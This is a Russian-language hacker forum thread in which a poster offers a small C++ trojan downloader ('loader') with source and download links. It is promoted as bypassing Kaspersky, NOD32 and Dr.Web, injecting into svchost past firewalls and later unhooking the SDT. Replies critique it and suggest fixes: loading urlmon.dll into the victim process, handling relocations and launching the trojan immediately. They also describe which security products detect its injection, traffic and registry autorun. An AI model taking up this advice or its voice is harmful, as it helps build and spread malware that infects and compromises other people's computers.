Решил написать лоадер. Просто выдрал из bloodknife`а всё ненужное. Так значит: 1)Вес не пакованый 4кб. 2)Каспер, нод, др.веб в ауте. 3)Инжект в svchost - фаеры молчат. На С++. Правите конфиг и юзаете. Естесн с исходниками. Внимание! Адептами програминга перед просмотром сороцев положить валидол под язык! http://lordofring.tushino.com/LOADER.rar http://rapidshare.com/files/39634411/LOADER.rar.html http://softz.ifolder.ru/2507458
Ну фто ж, начнём =) Метод инжекта не очень оригинальный. Но а вдруг выбранная тобой база уже занята? Тогда ведь песец ослику (С) =( Так что было бы неплохо добавить релоки и их обработку на всякий пожарный. Насчет добавления в автозапуск - ну эээ я например комп неделями не перезагружаю.. имхо все же лучше запускать троя сразу. Хотя это на вкус и цвет.. но тогда придется подождать завершения скачивания через WaitForSingleObject на объекте созданного в другом процессе потока Далее, а ты уверен, что URLMON.DLL окажется в адресном пространстве жертвы? Я - нет. Поэтому было бы неплохо вначало func() дописать LoadLibrary("urlmon.dll"); а то есть риск вылететь с Access Violation Ну а вообще кода там не очень много, про сотню строчек больше сказать, вообщем-то и нечего Разве что стиль отвратительный =) Ну ладно )
инжекст в свхост? и какие фаеры молчат, "огласите весь список пожалуйста" (с) называть вещи надо своимим именами, молчать будет, по-моему, тока виндовый фаер))) и пара таких же "псевдо" фаеров...
у мну НОД реагирует мож че то не так делаю... и согласен, что в хвост вставлять не стоит фаер по коннекту среагирует... угу а изменение реестра нод не палит да?...
Гы-гы svchost меняет реестр! Ужс! Можно конечн добавить чистку sdt, но тогда вес будет не 4 , а 11кб.
Вот, критику учёл. Вес 11кб(непакованый), чистка sdt , др.веб уже в теме... Заливать на разные файловики не стал - вес всего 7кб. http://lordofring.tushino.com/LOADERv.1.1.rar
я вот просто не понимаю, ну на*** такие потики создавать? типа вот я написал лоадер. традиционный (91ого года) метод инжекта. Традиционная скачка файлов. Вот и весь лоадер. Поставьте мне плюсики, я крутой кодер. Ну я сам тоже могу написать тебе ДДОС бота какого-нибудь очередного, со стандартным набором ф-ий. Это не кодинг а рисование - переклеивание чужих кусков кода в свои файлы. А что код у тебя вообще в .h это пиздец конечно.
Что ты имеешь в виду? + я не просил На ачате я не видел исходников работающего лоадера. А если и выкладывают какой-нить лоадер(без исходников), то это полное г. на которое фаеры и антивири кричат как коты на валерьянку. А тут те работающий пример + исходники. Согласен, что инжект палёвый, но я ведь добавил восстановление sdt.
Народ! Могу сказать только одно: критикуя - предлагай!!! Вон берите пример с греата, он небось немало подсказок дал.
понимаешь ли в чем дело. Во-первых, у тебя как бы антивирусы молчат, но это если скачивать нормальный файл. Потому траффик, который ты получишь через палится IMONом нод. Во-вторых, твой уникальнейший ключ реестра Current Version\Run, как и все подобные RunOnce и т.п. палятся anti-spyware аутпоста, глазами юзера да и кто знает чем ещё. В третьих, неясно что значит строка и зачем там нужен if, если потом стоит ; В четвертых, ZoneAlarm не даст тебе снять хуки sdt. Не даст загрузить драйвер или открыть секцию PHYSICAL MEMORY. причем, как я понял, это у тебя просто выдрано откуда-то с 99 года сорца, и засунуто в .h файл. В пятых, не понятно зачем тебе строки да и вообще все остальные. В шестых, нет никакого смысла в том что ты выложил. Лоадер он на то и лоадер. Что должен не палится. Должен непалевно скачивать файлы. Должен весить очень мало. Должен не использовать всякие чужие нестабильные ring0-переходы через колгейт. И не должен, наконец, быть собраным из чужих кусков сорцом. А вообще никаких претензий быть не может, просто тебе было скучно и нечего делать. Я это так понял. Причем, ладно бы если ты это написал на осенблере. Типа понтанулся бы) Как снег когда то понтанулся, выложив bindshell-исходник) А на c++ уже все остальные нубы умеют(( Этим народ не удивишь.
